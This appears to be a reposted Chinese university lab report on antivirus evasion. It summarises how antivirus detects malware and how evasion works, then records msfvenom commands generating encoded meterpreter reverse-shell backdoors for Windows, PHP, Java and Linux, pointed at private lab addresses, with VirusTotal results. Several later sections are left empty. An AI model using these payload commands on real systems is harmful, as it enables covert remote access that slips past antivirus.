首页 > 其他 > 详细

2019-2020-2 网络对抗技术-20175332 张苗-exp3 免杀原理与实践

时间:2020-03-28 23:54:47      阅读:104      评论:0      收藏:0      [点我收藏+]

目录


1.基础问题回答

(1)杀软是如何检测出恶意代码的?

  • 基于特征码

  • 启发式

  • 基于行为

(2)免杀是做什么?

  • 软件或代码免于杀毒软件的检测

(3)免杀的基本方法有哪些?

  • 改变特征码
    • 只有.exe ——加壳(压缩壳 加密壳)运行时慢慢释放
    • 机器指令已提取(有shellcode/meterpreter)用encode进行编码/基于payload重新编译生成可执行文件
    • 有源代码:用其他语言重新编写
  • 改变行为
    • 通讯方式:反弹连接/隧道技术/加密通讯数据
    • 操作模式:基于内存操作/减少对系统修改/加入混肴作用的正常功能代码
  • 非常规
    • 使用有漏洞应用作为后门
    • 编写攻击代码集成
    • 诱导关闭杀软

2.开启杀软能绝对防止电脑中恶意代码吗?

不能,使用上述方法可以实现免杀

3.实践过程记录

3.1正确使用msf编码器/msfvenom生成如jar之类的其他文件/veil/加壳工具/使用C + shellcode编程/使用其他课堂未介绍方法

(1)将实验二中生成的后门程序导入Virustotal进行查杀,并将查杀结果作为后续实验参照

技术分享图片

(2)正确使用msf编码器
一次编码命令:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00‘ LHOST=192.168.187.132 LPORT=5332 -f exe > met-encoded.exe

  • 参数解释:
    -e选择编码器
    -b是payload中需要去除的字符,由于shellcode以‘\x00‘为结束符,所以‘\x00‘不出现在shellcode中。

技术分享图片

  • 查杀结果:

技术分享图片

技术分享图片

十次编码命令

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.147.130 LPORT=5332 -f exe > met-encoded10.exe

技术分享图片

  • 参数解释: -i后加迭代次数

  • 查杀结果:很惊讶,360报病毒软件,但扫描竟然安全!

技术分享图片

(3)msfvenom生成如jar之类的其他文件
生成PHP后门文件

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.147.130 LPORT=5332 x> 20175332_backdoor.php

技术分享图片

查杀结果:

技术分享图片

生成java后门文件

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.147.130 LPORT=5332 x> 20175332_java_backdoor.jar

技术分享图片

查杀结果:

技术分享图片

生成linux后门文件

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.147.130 LPORT=5332 x> 20175332_linux_backdoor

chmod +x 20175332_linux_backdoor赋予权限

技术分享图片

查杀结果:

技术分享图片

(4)veil
######老师,我尽力了,实在安不上,试了一天了

3.2通过组合应用各种技术实现恶意代码免杀(如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。)

3.4用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

4.实践总结与体会

2019-2020-2 网络对抗技术-20175332 张苗-exp3 免杀原理与实践

原文:https://www.cnblogs.com/20175332zm/p/12585878.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!